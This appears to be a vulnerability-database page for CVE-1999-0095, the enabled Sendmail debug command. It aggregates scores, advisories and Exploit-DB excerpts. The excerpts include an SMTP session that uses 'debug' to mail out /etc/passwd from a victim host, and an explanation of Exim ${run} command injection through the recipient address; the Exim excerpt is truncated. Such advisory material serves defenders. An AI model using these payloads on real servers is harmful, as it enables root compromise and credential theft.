CVE-1999-0095
published 1988-10-01CVE-1999-0095: The debug command in Sendmail is enabled, allowing attackers to execute commands as root.
PriorityP354critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
16.45%
96.6th percentile
The debug command in Sendmail is enabled, allowing attackers to execute commands as root.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eric_allman | sendmail | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Berkeley Sendmail up to 5.58 DEBUG privileges management (CA-1988-01 / EDB-19028)
vuldb·2026-04-16·CVSS 10.0
CVE-1999-0095 [CRITICAL] Berkeley Sendmail up to 5.58 DEBUG privileges management (CA-1988-01 / EDB-19028)
A vulnerability, which was classified as critical, was found in Berkeley Sendmail up to 5.58. This vulnerability affects unknown code of the component DEBUG Handler. Such manipulation leads to improper privilege management.
This vulnerability is referenced as CVE-1999-0095. It is possible to launch the attack remotely. Furthermore, an exploit is available. This vulnerability has historical importance owing to its background and reception.
You should upgrade the affected component.
GHSA
GHSA-pf77-xv47-9wfc: The debug command in Sendmail is enabled, allowing attackers to execute commands as root
ghsa_unreviewed·2022-04-30
CVE-1999-0095 [HIGH] GHSA-pf77-xv47-9wfc: The debug command in Sendmail is enabled, allowing attackers to execute commands as root
The debug command in Sendmail is enabled, allowing attackers to execute commands as root.
No detection rules found.
Exploit-DB
Exim 4.87 < 4.91 - (Local / Remote) Command Execution
exploitdb·2019-06-05·CVSS 9.8
CVE-2019-10149 [CRITICAL] Exim 4.87 < 4.91 - (Local / Remote) Command Execution
Exim 4.87 address));
6130 deliver_domain = expand_string(
6131 string_sprintf("${domain:%s}", new->address));
6132
6133 (void) event_raise(event_action,
6134 US"msg:fail:internal", new->message);
6135
6136 deliver_localpart = save_local;
6137 deliver_domain = save_domain;
6138 }
6139 #endif
Because expand_string() recognizes the "${run{ }}"
expansion item, and because new->address is the recipient of the mail
that is being delivered, a local attacker can simply send a mail to
"${run{...}}@localhost" (where "localhost" is one of Exim's
local_domains) and execute arbitrary commands, as root
(deliver_drop_privilege is false, by default):
[...]
Remote exploitation
Our local-exploitation method does not work remotely, because the
"verify = recipient" ACL (Access-Control List) in Exim's def
Exploit-DB
Berkeley Sendmail 5.58 - Debug
exploitdb·1988-08-01
CVE-1999-0095 Berkeley Sendmail 5.58 - Debug
Berkeley Sendmail 5.58 - Debug
---
220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from:
250 OK
rcpt to:
250 OK
data
354 Start mail input; end with .
mail [email protected] </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating
The sed in the receipient strips all mail headers from the
message before passing it on to the shell.
http://seclists.org/fulldisclosure/2019/Jun/16http://www.openwall.com/lists/oss-security/2019/06/05/4http://www.openwall.com/lists/oss-security/2019/06/06/1http://www.osvdb.org/195http://www.securityfocus.com/bid/1http://seclists.org/fulldisclosure/2019/Jun/16http://www.openwall.com/lists/oss-security/2019/06/05/4http://www.openwall.com/lists/oss-security/2019/06/06/1http://www.osvdb.org/195http://www.securityfocus.com/bid/1
1988-10-01
Published